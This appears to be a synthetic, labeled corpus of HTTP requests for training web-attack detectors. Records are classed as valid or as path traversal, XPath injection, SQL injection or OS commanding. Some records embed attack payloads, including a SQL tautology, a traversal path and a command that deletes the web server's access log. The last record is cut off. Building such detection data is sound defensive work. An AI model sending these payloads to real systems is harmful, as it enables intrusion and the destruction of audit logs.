Accept-Language: df-wtue9, an5qtyp-rlalsrV;q=0.4, doifis-9Rn;q=0.8, iqtejiry-zo;q=0.7, aud-lieinlEt
Cache-Control: no-transform
Client-ip: 200.187.223.208
Cookie: sam.GGl=82352303
Cookie2: $Version="7"
Date: Wed, 11 Feb 04 16:30:58 GMT
ETag: "o1qvhU2H71Tkj2vS9"
Expect: 100-continue
From: erOso4A0@Obex.be
If-Modified-Since: Thu, 04 Jun 09 17:12:23 GMT
If-Unmodified-Since: Thu, 10 Dec 09 15:45:13 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 41
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: feqo io6ne=i6yEsEt
Range: -75,624299-,-14
Referer: http://Fjard.gov/eieler.swf
TE: deflate
Trailer: Transfer-Encoding
User-Agent: aH.y6Tht http://www.edMo.it
UA-CPU: MIPS
UA-Disp: 055,684,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 242x137
Via: 3.5 113.240.65.1:37, 6.1 48.199.147.18
Transfer-Encoding: identity
Upgrade: oeLob/1.5, p4rvo/8.7, r8nc/7.6, akd/5.3, Oa6eds/9.9
Warning: 557 www.uatTo.png "emmsfj6abd" "Sat, 17 Apr 10 07:43:49 GMT"
X-Forwarded-For: 96.77.6.216
X-Serial-Number: 96037126110
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~

neh0eeNmnte=1o~gdsdtrb

End - Id: 4013
Start - Id: 32416
class: Valid
GET /e1rpSxAp-Q97/gsystemC/lonv8moesp/aknkentnstNdqirT/nLD7xQedowE@0i2Ry/u9oDuc/r@61oQ6oiMR/9oyan1ioshEujrem/eioamehn.jpg? HTTP/1.0
Host: 151.21.83.245
Connection: close
Accept: video/*, application/*
Accept-Charset: x-mac-ce
Accept-Encoding: deflate, deflate;q=0.8
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 183.35.15.71
Cookie: c03=44500;tmNslt2cu4tth=hdwerosnerN;thieiRadr0heOl=etnajs&ll]c;snl=pthijicnvrgcreE9s;io3hIa=6 tl1xisofa uae;xscoz=hm
Cookie2: $Version="1"
Date: Thu, 15 Mar 07 23:27:05 UTC
ETag: W/"93RUwlNG4KegyyA"
Expect: 100-continue
From: releg@syoCrleekk.net
If-Modified-Since: Wed, 22 Sep 04 08:20:55 CET
If-Unmodified-Since: Tue, 29 Aug 06 16:56:52 UTC
If-Match: *
If-None-Match: "F6OaPjtobeS7YLIey"
If-Range: "UoLBQ7pQHOe-avob3sgn"
Max-Forwards: 2
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM cXI0cm92enJpdWFsNmtnMWN5Y3Nsd2l0NDduZWVlZXJuZm9l
Authorization: NTLM Y3l3ZWN6Z25iZTRhaXJpZWh3U241bE9pYVllcmF2YWMxbg==
Range: -9,-9053,093-28
Referer: /2zti.msf
TE: deflate,gzip;q=0.8
Trailer: If-Match
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 3.4; bw-9n; rv:3.8.4) Gecko/71516676
UA-CPU: MIPS
UA-Disp: 7145,6642,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 441x524
Via: rot/3.0 www.rhnuRw.htm, 6.2 www.hluyx.jpg
Transfer-Encoding: compress
Upgrade: wrt/4.4
Warning: 286 www.NaiYvg3.css:98360 "iondiidelgzicr0rouen" 
X-Forwarded-For: 15.195.139.253
X-Serial-Number: 32097
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32416
Start - Id: 32869
class: Valid
POST /01/eugUtWa/.or86B9h/.H/ree/TTsIxp_R@iT-copyls/aVtARebkm.htm? HTTP/1.1
Content-Length: 77
Content-Language: Dn6,kif7,sia0nfws
Content-Encoding: deflate
Content-Location: /C3nes.php
Content-MD5: amR5aHRvOG9ydGkyZm13Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Feb 08 15:13:52 GMT
Last-Modified: Mon, 19 Apr 04 06:41:45 UTC
Host: 29.186.249.195:80
Connection: keep-alive
Accept: application/*;q=0.3, application/zip;q=0.7
Accept-Charset: koi8;q=0.6, koi8-r, x-mac-japanese;q=0.2, x-mac-arabic;q=0.1
Accept-Encoding: identity;q=0.0, compress, deflate;q=0.7, deflate;q=0.9, gzip
Accept-Language: omnmeoTs-O, d6dawd-wc, 3he-rtann;q=0.4, 4neioU-fPenc;q=0.1, o-c;q=0.4
Cache-Control: no-cache
Client-ip: 221.137.99.223
Cookie: hrtTm5y7o8iE3ve=0631;GYrJreplace@Cai1=th;pn0dhc6jeMi=tbinput;ehmst=Io;iV1mf=11745149
Cookie2: $Version="30"
Date: Wed, 30 Jul 08 24:09:51 UTC
ETag: W/"CHO@zlKOXxISf4lt6i3i"
Expect: 100-continue
From: taoanoi@ags2rpme.org
If-Modified-Since: Sun, 29 Jan 06 10:22:55 CET
If-Unmodified-Since: Wed, 20 Oct 04 15:00:04 UTC
If-Match: "2QNT@xCDlH2BsbOET8L"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: fi3zye 7ontIola=d0hrfa
Authorization: NTLM dFFvcnNJZWpBRXhQYzh3MW92aXJlN2VoaG94b2thanRXUg==
Range: 210-26,-43,957-
Referer: http://0iDsisht.fr/ctteAeDr.jpg
TE: trailers,gzip,chunked;q=0.7
Trailer: Warning
User-Agent: Mozilla/2.2 (X11; U; Unix 4.8; ox-od; rv:8.8.7) Gecko/74258328
UA-CPU: PowerPC
UA-Disp: 523,5412,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 742x1351
Via: HTTP/1.0 166.194.255.138
Transfer-Encoding: compress
Upgrade: v0ru/7.0, lpaol2/3.4, cnEfc/0.0, eio/9.0, hosamd/2.9
Warning: 299 174.29.128.72 "setBezidiuloeuepNe" "Fri, 02 Jul 04 12:55:39 GMT"
X-Forwarded-For: 222.194.36.22
X-Serial-Number: 844313941
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lV3JOU=unsock_streamaasd&7TMF=2dancctqemxqcxi&EyyZqzrhomekb6=13540&5VFK=wfdde

End - Id: 32869
Start - Id: 14452
class: Valid
GET /SmCN/hctf/t5bb6I3lGG3/bp/ovQDlU--6Z5edjxRdLr/VDo.css? HTTP/1.1
Host: 219.73.142.57
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: xEb-rady;q=0.1
Cache-Control: fepnto=n6vrPi
Client-ip: 82.189.52.115
Cookie: 2zXVlscript2T%u=xoekiekai
Cookie2: $Version="15"
Date: Wed, 30 Jun 04 20:06:03 GMT
ETag: W/"jDK252a@c3hzQddGNCD"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Wed, 15 Apr 09 09:27:33 CET
If-Unmodified-Since: Tue, 16 Jun 09 13:38:14 UTC
If-Match: "1-Yk9cSEXfgfXMFNYJ"
If-None-Match: "ys32pmFs_h_BEyApBK"
If-Range: Fri, 14 Oct 05 06:19:41 CET
Max-Forwards: 781
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: oa7d0 neletwg=tdqaeth
Authorization: Digest nc=b46f2f7b
Range: -517,627-,587-701
Referer: /aehneren/Wufrwn/nsrfSe/akoltHas/fetd.txt
TE: gzip;q=0.9,deflate;q=0.7
Trailer: Date
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 3.0; ij-ae; rv:9.4.5) Gecko/23930428
UA-CPU: 68000
UA-Disp: 854,140,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5927x518
Via: HTTP/3.9 246.65.10.128
Transfer-Encoding: identity
Upgrade: trkh/8.6, taslsi/0.6, se2/8.7, etaY/5.5, dpsae/7.4
Warning: 847 183.112.194.21 "jRtnvs4nlix" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 309851
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14452
Start - Id: 20199
class: Valid
GET /5AHR4BR80BAValCmO/isy/_w5imgxYYgI/dlswA5Snti5m2tecoo7e/iu/VHe3.png?r4ac=+&qNM3jYrZWwindow.open=se5shutdownr%3Bs&ssf=5077156&rAIhi6=471844702&e6U1=eq6Xjn5pp&xsegniso=1&yophusp=wtordeOnO&elZ64zLV=6717&u0ntuajeQuOsmd=agG&wNjyi2psTr27=e%25uof HTTP/1.1
Host: 13.10.130.141
Connection: close
Accept: application/postscript;q=0.8, video/mpeg;q=0.3, video/mpeg
Accept-Charset: koi8-r;q=0.7, utf-8;q=0.3, iso-8859-15, isiri-3342
Accept-Encoding: *;q=0.0
Accept-Language: rcxEooea-h;q=0.8
Cache-Control: only-if-cached
Client-ip: 205.196.222.139
Cookie: yjaj2itw=5;Aexec91-dwhere=hylandeel$ftiframean5Ascriptam;ycc=n;tiEreoQ=57242;obhr=u;vrw81dtr5eL=Kew8
Cookie2: $Version="0"
Date: Thu, 29 Mar 07 23:35:25 CET
ETag: "M8E9jA9nfA7H4st9Hp"
Expect: 100-continue
From: bSdc@weygI.it
If-Modified-Since: Mon, 23 Jul 07 09:09:22 GMT
If-Unmodified-Since: Sun, 01 Apr 07 15:29:41 UTC
If-Match: "4gHqoi7C_0svUZ6_1_w"
If-None-Match: *
If-Range: "oeTw67LZPIwf1taAX9"
Max-Forwards: 8
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic bG1kbzpUdzJw
Authorization: Digest nonce
Range: 365749-,607-065
Referer: /g5e5t/i2wad/tn2hcoe/rys9m/plida.php
TE: gzip;q=0.5,gzip
Trailer: Trailer
User-Agent: Mozilla/3.7 (X11; U; SunOS sun4u 5.1; nt-nl; rv:1.8.0) Gecko/23275314
UA-CPU: x86
UA-Disp: 7522,1953,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4940x047
Via: 4.7 www.3giheez.tiff:3904, HTTP/1.7 www.obDbnsi.png
Transfer-Encoding: identity
Upgrade: lsath/8.3
Warning: 651 88.213.252.125:060 "5sir4foalundnc" "Thu, 24 Mar 05 09:39:40 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 331968303499551
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 20199
Start - Id: 44790
class: PathTransversal
GET /iEI6ejVr7T6XnnS/nhidq68htSaejt/locationXEV@AJ.4/ZlikevphpdoGp9Qdrop.php4?ni0dms=68669636&cg0xolocationLts=vrevaly&anNh=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&fxbxbusr=irWLcceoohGsh&xml0xSx.=halmeoas8ut&cotOhc=stihlhypkeeh&ie=tzfIDWO1cR&ehoagityhatmD=538&onteyd4IAjcSlZm=hnlms7leuz&FZtmpDfRUumeta=139&icDZ_Zu=oVrchBrjiCikeic&ikl=q7window.open9e&nnaicrie=sFAGE3lCw&todoyl=7%27zr+ThlOs8t HTTP/1.1
Host: www.etoc0ps.net
Connection: keep-alive
Accept: video/mpeg, text/*, application/*
Accept-Charset: x-mac-japanese;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 108.193.198.116
Cookie: neet=9157226;pWuvrbnuh=df|
Cookie2: $Version="24"
Date: Fri, 24 Nov 06 21:53:08 GMT
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Mon, 27 Mar 06 13:37:41 GMT
If-Unmodified-Since: Sat, 20 Feb 10 11:26:53 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Jun 07 16:07:58 CET
Max-Forwards: 3
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM RkU2b1REdHRpaWl4cmVlb3Ruc2Z1dGRmY2hmaWVnZG55ZW9iYm9vYTJ3ZGNuZw==
Range: -935
Referer: http://www.re1se.org/ewmatlnp.js
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: Mozilla/5.9 (X11; U; Open BSD i586 5.9; n8-pM; rv:7.0.5) Gecko/33410929
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 3.1 139.148.75.56, 4.1 www.vd5p.gif, 9.0 240.148.45.168
Transfer-Encoding: gzip
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44790
Start - Id: 7350
class: Valid
POST /EgGrWFQk/lntOurnoI1ulauasn/enjo8t3Eo/escronxexyigeb.jpeg? HTTP/1.0
Content-Length: 118
Content-Language: pdok,naaa8ac,mrs6ue
Content-Encoding: identity
Content-Location: /ta4b8a/wwsnNs.pl
Content-MD5: YW10d29lYW95cGE3NmR4dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Jun 05 10:18:47 UTC
Last-Modified: Thu, 02 Jul 09 01:29:10 CET
Host: 146.63.159.219
Connection: hoeslm3h
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: iKcrcs-9Csrt1ev, a3ad-t8
Cache-Control: only-if-cached
Client-ip: 127.183.145.17
Cookie: ogbontb3n=deioaa;f7mufNr=n;opnotumlje=httpec'aoxterm;iease=77392301;e9ceiilhAid=9515794;O9cQOfbetweenimgdropN8=Lcatyadmindna
Cookie2: $Version="61"
Date: Thu, 25 Oct 07 21:22:22 GMT
ETag: "VMXKom2AeWDn89jSjRqc"
Expect: 100-continue
From: paelsta@Bijzxj.uk
If-Modified-Since: Tue, 29 Aug 06 18:51:43 CET
If-Unmodified-Since: Fri, 08 Jul 05 01:29:25 GMT
If-Match: "kDRxuCgDlpJo0nIgi"
If-None-Match: "NuuA2ptE-ehVutACWXl"
If-Range: Sat, 15 Oct 05 14:44:42 GMT
Max-Forwards: 8
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: r5it7 xtlcz=Plhl65g5
Authorization: Digest nc=8008da34
Range: 16991-,-9775,-255
Referer: /u5inNg/ees3Cdn4/1bno.mspx
TE: trailers,deflate;q=0.6,trailers
Trailer: User-Agent
User-Agent: 8nnrq7npttvo3kaOhaq
UA-CPU: StrongARM
UA-Disp: 457,861,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 965x983
Via: 5.4 www.e1gs0q.png, po7qti/5.2 238.7.87.251:84, FTP/9.1 212.242.15.228
Transfer-Encoding: m6ae
Upgrade: mtg/7.7
Warning: 102 www.baEeoPim.jpeg "sohwlnnjrcR" 
X-Forwarded-For: 181.117.178.72
X-Serial-Number: 33978029627174385263
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

lVcc=a<on&EmHoulse=[ $odsrS=8sw4lssmt&oyngMi=hdTsbxterm-o9ewp-3(njRoexecv&adqsiba=gowdtpasezm&sFusrnE3IIe=lT

End - Id: 7350
Start - Id: 48883
class: XPathInjection
GET /tECYNET3D9U01RuqiLU/leieRlKN/s@nuJVW8D/10xRmojHinputEZPi/po-qmytvG5H.tiff?lu2=%5Cnt&kaallt8ir=07244&rgbpmnrbecOpcbs=eeouLio%24fest%3Brve&lafndc=8510++or++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++45599%3D&sNn1ntdwm=7my626he4Jb&mteadiowie=idQw6qoXap&Ppasswdx9bodyMl3n_=391&defie=iori5aiDIea&r7=25 HTTP/1.0
Host: 126.230.51.189
Connection: close
Accept: audio/x-wav
Accept-Charset: iso-2022-jp, euc-tw;q=0.9, euc-kr, koi8-r, iso-10646-ucs-2;q=0.7
Accept-Encoding: compress, deflate;q=0.8
Accept-Language: eerbm-el, foe5-wqU6, aoC3fir-lSdee;q=0.7, elbieh-dtli, opedy-sejfpan7;q=0.3
Cache-Control: no-transform
Client-ip: 220.116.206.243
Cookie: bit8zpiedc=98959;ecGg2tycrE=434460318
Cookie2: $Version="409"
Date: Wed, 23 Jun 04 21:03:12 UTC
ETag: "62GK_7jLYsp@BqfFlhae"
Expect: 5iusOoAi
From: nhrer@c9ndnn.gov
If-Modified-Since: Mon, 18 Aug 08 16:01:49 GMT
If-Unmodified-Since: Thu, 09 Aug 07 08:35:45 UTC
If-Match: *
If-None-Match: "xZBam07P2VwFIbTCYU"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 896
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Basic dGg3c3I6dW5scG5lZg==
Range: 41-,-69
Referer: http://www.i2aehir.cz/8eimhm/ecfoe.php4
TE: gzip,trailers,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/4.7 (Windows; U; Win 9x 2.0; sg-ja; rv:0.8.6) Gecko/08659415
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/5.6 28.237.93.34
Transfer-Encoding: gzip
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 737 218.64.14.144 "btkeCbiitsnonn" "Tue, 09 Aug 05 16:53:24 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48883
Start - Id: 42696
class: SqlInjection
POST /sIweacermAv/edymaihas/httppassthrustyle4otb.jpeg? HTTP/1.1
Content-Length: 173
Content-Language: 9hs5ssar,9
Content-Encoding: identity
Content-Location: /hhun7td/nedrblof/uhot/0Npm6/abeblna.cfm
Content-MD5: ZGhncXdyem5hdWlZcmVvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Oct 06 21:52:47 GMT
Last-Modified: Fri, 22 Jul 05 15:27:34 CET
Host: www.xenbece.org:98736
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.0, gzip;q=0.7, compress;q=0.0
Accept-Language: '    OR   'e'='
Cache-Control: max-stale
Client-ip: 139.253.185.119
Cookie: ao9apDrtope7ha=o.Y;edk=tarEJeA;xhfg=6536;iNaruiilm=haheed
Cookie2: $Version="22"
Date: Sat, 12 Mar 05 15:01:49 UTC
ETag: W/"yCxBZS3Kyg8dm6bXO_"
Expect: iscornt=Rl3N;5pitn=bjcog
From: 1nnTne@iveby3la.uk
If-Modified-Since: Thu, 29 Dec 05 16:03:16 UTC
If-Unmodified-Since: Wed, 21 Dec 05 13:07:56 CET
If-Match: *
If-None-Match: *
If-Range: "n-XukQRmEEGFyrwYHS"
Max-Forwards: 154
MIME-Version: 8.0
Pragma: oe4sr=cn7eevn8
Proxy-Authorization: Digest opaque="bii1e"
Authorization: NTLM eWFubm9pZWVvZTRodXJpZml0aThyZW5wemUzb25hNG9rcnMyRQ==
Range: -04,546226-,740980-
Referer: http://www.avoiimu.it/rgsa7i/3en0nkU/tiadeo0l/Fualt/tessnng2.jpeg
TE: trailers,chunked;q=0.4
Trailer: Connection
User-Agent: hExceeh
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/8.3 www.kseu.jpg, ter/4.6 www.mheosncu.gif, 1.4 www.atgthss.gif
Transfer-Encoding: identity
Upgrade: yhsa/7.0, ltu/5.5, 8is/5.2, litm/1.8
Warning: 910 www.idcir.shtml "6amsbimteinud6eDrte" 
X-Forwarded-For: 29.202.205.12
X-Serial-Number: 0088484140288112965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qfpassthruxX8etcr0o.E=2160&oQbuo=9&mias5e9=oetync/aHo&CQreplaceo5GXcAeftp=ze5WBP2isa0&UyFl=vbscriptw:>?icate )idoph9$&a9secnNeenwhs=2bnes&ocoan1mtxop=edconnectre

End - Id: 42696
Start - Id: 32265
class: Valid
GET /tfA_mYv/rtzelWuc.gif?hsayIk09znqsse=4906741&rereeanu6wrgvn=%2Brw0jhEit&souobLmaOh=c4%26winput%5Bcopykz%27aruyidI&53DfIAcservicesY=37054&1isDZ6rdropUCA8=rwedRoe&b6tbfn=f HTTP/1.1
Host: www.dxoeL.be:83861
Connection: close
Accept: text/*;q=0.4, application/*, text/*;q=0.9
Accept-Charset: cp-932, iso-8859-1, cp-950, euc-cn, windows-1258
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4384
Client-ip: 38.26.20.181
Cookie: hieegEeS=trotr6eusrnntRun
Cookie2: $Version="518"
Date: Fri, 10 Mar 06 07:56:39 GMT
ETag: W/"Atfw@xh8-ov-YUnl"
Expect: 100-continue
From: reTalc0@UoiRxreIr5.uk
If-Modified-Since: Tue, 05 Aug 08 13:22:12 UTC
If-Unmodified-Since: Thu, 12 Apr 07 08:18:19 UTC
If-Match: "Q9.B1oN2oVLkEvNXYgF"
If-None-Match: *
If-Range: Thu, 31 Dec 09 02:03:29 CET
Max-Forwards: 6931
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: srie 7y85rp=eaTsher
Authorization: Digest realm
Range: -265,3-,-2
Referer: http://Joeent.de/xfaehi/sphia/zEI4xa.asp
TE: trailers
Trailer: Trailer
User-Agent: A1an1esm (nt8lH0re6u; r0ZsJMRvRD; cesm1Y; ibZSpaON; bApTL-4)
UA-CPU: StrongARM
UA-Disp: 8350,6514,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3225x292
Via: HTTP/8.9 www.sebtaf.gif
Transfer-Encoding: deflate
Upgrade: skeho/2.7
Warning: 276 144.197.192.204 "hsEwst6bs9l" "Wed, 19 Mar 08 20:42:32 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 23704390818995644
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32265
Start - Id: 23469
class: Valid
GET /Kv4L1o/4t/9Se4sIcaxdsrdr/v32AQxMkI48iuK_OS/xwX/sl2Asbu0TtcMe/kegeu4ics5/ytUawocsl.gif?yd=216301574&etp=110&4t=715697817 HTTP/1.0
Host: 112.41.208.224
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 153.160.70.239
Cookie: fpcat=edadcensitr7awsi;iliuhaceooahoag=995789;twra=14;rnsiMt9=;rB gnsuprocessing-instructionE2; yc
Cookie2: $Version="95"
Date: Sun, 01 May 05 24:28:28 CET
ETag: W/"RIfYtYej031C5aIWB1pX"
Expect: retyst
From: nsiialel@smwti.cz
If-Modified-Since: Thu, 01 Jan 09 10:04:33 CET
If-Unmodified-Since: Fri, 15 Jul 05 09:52:40 GMT
If-Match: "tfo-oyRxy3UdkIjX4e"
If-None-Match: "d9P6mBbym2@DT0WGccn"
If-Range: Fri, 09 Jun 06 12:48:00 CET
Max-Forwards: 3212
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="4EElwe"
Authorization: Basic dGVkeXBzTnQ6b2VwaHJ3
Range: 183482-976,-34084,02-
Referer: /eelspwn3/noltvn.nsf
TE: trailers,trailers,trailers
Trailer: From
User-Agent: aniU2ilotebetfesmaD
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 543x2792
Via: 0.1 163.23.0.6, HTTP/0.3 www.s1lnl.html, 6.3 www.tais.png:51070
Transfer-Encoding: deflate
Upgrade: aef0/8.9, reo/8.3, ics/7.6
Warning: 683 www.fFdgenep.jpeg "pNdodrhDroeousrSreo" "Mon, 16 May 05 21:27:45 GMT"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 5183522523
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23469
Start - Id: 29091
class: Valid
GET /u5asd03/tadcitwsnCls/Nh0sdvlhoTf3xne/nVd.iharIx/bhB9tA/eea9eIamt5apo.html?ydI.v=oeOlss&steeteitoeie5t=ttT&ea=OFt9t&ann7geu=298821&BWcopyp4_=10&cGshutdowna6PA.stdinZL=ilannegtaea0Rsiaz&MGqcloglocationgroup byz3Sq=l+fd&EIK-K=66072122&r9sdhco=i4dropecrtigt0&0eihoe9ainionm=7kRKWK2%40P HTTP/1.1
Host: www.donerctiw.com
Connection: et5aceE
Accept: */*;q=0.0
Accept-Charset: euc-kr;q=0.3, x-mac-turkish, euc-cn;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: eRehie=6o7o5
Client-ip: 62.61.118.78
Cookie: inewektsfhoc=kswoTt;eihaaz=48999;M0QAPz-fZuv8=tg
Cookie2: $Version="77"
Date: Thu, 14 Sep 06 24:47:45 GMT
ETag: "ZRSDHtKpcZmCV4Nn"
Expect: 100-continue
From: nbrdn3@nn5EreeeAS.fr
If-Modified-Since: Wed, 22 Feb 06 01:27:52 GMT
If-Unmodified-Since: Thu, 08 Dec 05 21:03:23 UTC
If-Match: *
If-None-Match: "LIaPHwjkroqC_SpWi"
If-Range: "rApmm@eSyvM_b2HnoU6"
Max-Forwards: 058
MIME-Version: 8.2
Pragma: 3oet=cf8oi
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://eeuh.st/euseere/81nuAe/1oaW/T4sessoL/etipi.cgi
Range: -5612
Referer: http://nslb.de/ulvbai3/ahossp/raoesc.gif
TE: trailers
Trailer: Accept
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 7.8; se-rY; rv:1.6.9) Gecko/18654725
UA-CPU: x86
UA-Disp: 352,591,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7767x3879
Via: FTP/3.3 www.naZeD.jpeg, 0.4 www.weihcsi.jpg
Transfer-Encoding: deflate
Upgrade: teav/2.5, xneK/0.8, ecrUt/0.0, a8tr/4.9
Warning: 320 www.eroso.png:40 "mOorarxnsr82arTiS" 
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: ----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29091
Start - Id: 10687
class: Valid
GET /dI2lsIRO3K0ab@DV9.mspx?iwhwi=02&etser=59&77t=p%2F+diva&nseshatHmllhfno=030602212&dytaindaaltama=46&wynse35heeyaXa=noo2t&ehsU=48&TCZ2Lhtad=Oi&aopShyme=aD3--nx&dysrsemumr=+%5B7-vhttpet%7Clo%5Cm2eg&nrrs=r1ay&ssodfnhore4e=67459419&dtytttzo=EXR%40E%3C&ilscn=lo7isdocumentaccept&QtPpsZ=sr7gaItxAhtSnotol HTTP/1.0
Host: www.ifqea5n4g.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: a7-ssfwyled, sm-iooy3t;q=0.3, neot-s, iiiu-eu, 9gtoSt-aloO;q=0.9
Cache-Control: max-age=67
Client-ip: 245.69.51.123
Cookie: aeswlr=SE4;j9lyoMee=imeMtpmlsAa
Cookie2: $Version="902"
Date: Fri, 10 Nov 06 04:13:01 GMT
ETag: "c7TaWn1qmplrGR5OVY"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Sat, 29 Oct 05 16:18:27 GMT
If-Unmodified-Since: Fri, 04 Aug 06 17:25:12 CET
If-Match: "@v5Q5eXotlcRj0xv"
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic YW5uTnNhYzp3c2Vvd3Nz
Authorization: Digest username="ihtsao"
Range: 9268-2780
Referer: /aitwyr/etetrr.pdf
TE: trailers
Trailer: Accept-Language
User-Agent: gtdh7/6.1.7.8.1
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6678x842
Via: 0.1 www.eaao.gif, FTP/2.7 www.ciyn.shtml
Transfer-Encoding: gzip
Upgrade: g9iut/7.2, bobt/1.2
Warning: 661 58.176.214.95 "ctt1w" "Mon, 08 Aug 05 18:46:01 CET"
X-Forwarded-For: 87.119.214.253
X-Serial-Number: 61836030943693836544
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10687
Start - Id: 43465
class: OsCommanding
GET /n6gtevysuAtranoy/osssrctkeeete/iaedWbjoP0rneize0/he1Zq554-v1mI3_Dr/dtt/46uZuqD7TjIfoq-/trqoL-EB/marsheitrv0ee7s/7laaiinnt1k7hhsmy.mdb?uuowsuxshzZa=%250arm+++-f++++%2Fvar%2Flog%2Fhttpd%2Faccess_log++++%3B HTTP/1.0
Host: 54.173.62.175
Connection: Nhbora
Accept: */*;q=0.2
Accept-Charset: iso-8859-8, isiri-3342;q=0.7, cp-936, hz-gb-2312;q=0.5, iso-8859-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 5.223.71.17
Cookie: qic8onrtn9ntav=rFj3a
Cookie2: $Version="5"
Date: Thu, 05 Jun 08 18:52:47 GMT
ETag: W/"HdxF4Pc2cI8Pr7_vJL"
Expect: 8oyrtlas
From: t3bs@fsiaebtorf.it
